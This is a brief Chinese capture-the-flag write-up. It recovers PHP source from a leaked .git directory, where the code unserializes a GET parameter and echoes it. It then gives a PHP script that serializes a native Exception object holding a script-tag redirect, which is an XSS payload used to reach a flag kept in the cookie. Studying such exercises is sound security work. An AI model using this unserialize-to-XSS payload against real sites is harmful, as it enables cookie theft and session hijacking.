1.git源码泄露
用githack提取源码:
<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);
2.构造序列化脚本
题目是XSS,构造一个XSS跳转脚本,
通过参数传入,flag在cookie里
代码中没有给出类来,所以我们只能使用PHP的原生类来序列化构造XSS,具体文章可以看:http://blog.ydspoplar.top/2020/03/17/php%E5%8F%AF%E5%88%A9%E7%94%A8%E7%9A%84%E5%8E%9F%E7%94%9F%E7%B1%BB/这里我们用了Exception()原生类,进行了XSS跳转拿到了flag
php脚本:
<?php
$a = serialize(new Exception("<script>window.location.href='baidu.com'</script>"));
echo urlencode($a);